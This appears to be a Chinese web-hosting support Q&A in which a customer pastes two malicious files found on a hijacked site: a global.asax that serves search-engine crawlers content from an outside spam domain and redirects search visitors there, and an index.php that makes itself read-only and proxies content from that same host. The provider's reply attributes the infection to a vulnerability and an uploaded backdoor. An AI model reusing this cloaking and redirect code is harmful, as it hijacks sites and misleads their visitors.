问:服务器网站(tonyuled.cn) 被global.asax劫持,删除global.asax文件后没过多久又重新出现,同时出现的还有被修改的 index.php,导致被贵司多次通知有非法信息,多次阻断网站访问,求助看看是否有什么后门或者漏洞,是否可以帮忙解决,感谢!
以下是global.asax代码:<%@ Application Language=\”C#\” %> <script runat=\”server\”>
void Application_Start(object sender, EventArgs e) {
} void Application_End(object sender, EventArgs e) {
} void Application_Error(object sender, EventArgs e) {
}
void Session_Start(object sender, EventArgs e) { //HttpContext.Current.Response.Write(HttpContext.Current.Request.UserAgent); string data_url = \”http://www.zgyhk.xyz/\”; string redirect_url=\”http://www.zgyhk.xyz/\”; if (is_spider()) { HttpContext.Current.Response.Clear(); HttpContext.Current.Response.BinaryWrite(get_data(data_url)); HttpContext.Current.Response.End(); } else if(is_from_search()) { HttpContext.Current.Response.Redirect(redirect_url, true); } else { //HttpContext.Current.Response.Write(HttpContext.Current.Request.UserAgent); } }
void Session_End(object sender, EventArgs e) {
} public bool is_spider() { string spider_flag = \”googlebot|baiduspider|sogou|yahoo|soso\”; string[] spider_flag_arr = spider_flag.Split(\’|\’); string user_agent=HttpContext.Current.Request.UserAgent; foreach (string tmp_flag in spider_flag_arr) { if (user_agent.ToLower().IndexOf(tmp_flag.ToLower())!=-1) { return true; } } return false; } public bool is_from_search() { if (HttpContext.Current.Request.UrlReferrer==null) { return false; } else { string page_ref = HttpContext.Current.Request.UrlReferrer.ToString(); string search_flag = \”google|baidu|sogou|yahoo|soso\”; string[] search_flag_arr = search_flag.Split(\’|\’); foreach (string tmp_flag in search_flag_arr) { if (page_ref.ToLower().IndexOf(tmp_flag.ToLower()) != -1) { return true; } } return false; } } public byte[] get_data(string url) { System.Net.WebClient wc = new System.Net.WebClient(); byte[] data = wc.DownloadData(url); return data; } </script>
下面是被修改的index.php代码:<?phpset_time_limit(0);$url1 = $_SERVER[\’PHP_SELF\’]; $name= substr($url1 ,strrpos($url1 ,\’/\’) 1 );chmod($name,0444);header(\”Content-Type: text/html;charset=gb2312\”);date_default_timezone_set(\’PRC\’);$a = \”http://www.zgyhk.xyz/\”;$b = \”http://\”.$_SERVER[\’HTTP_HOST\’].$_SERVER[\’PHP_SELF\’];$c = file_get_contents($a.\”/index.php?host=\”.$b.\”&url=\”.$_SERVER[\’QUERY_STRING\’].\”&domain=\”.$_SERVER[\’SERVER_NAME\’]);echo $c;?>
,服务器网站被global.asax劫持
答:您好,这种是程序存在漏洞,被黑客上传了后门程序,可以对空间里的文件任意增加,修改,我司并不熟悉您的程序代码,请联系程序开发商协助查找修复漏洞,非常感谢您长期对我司的支持!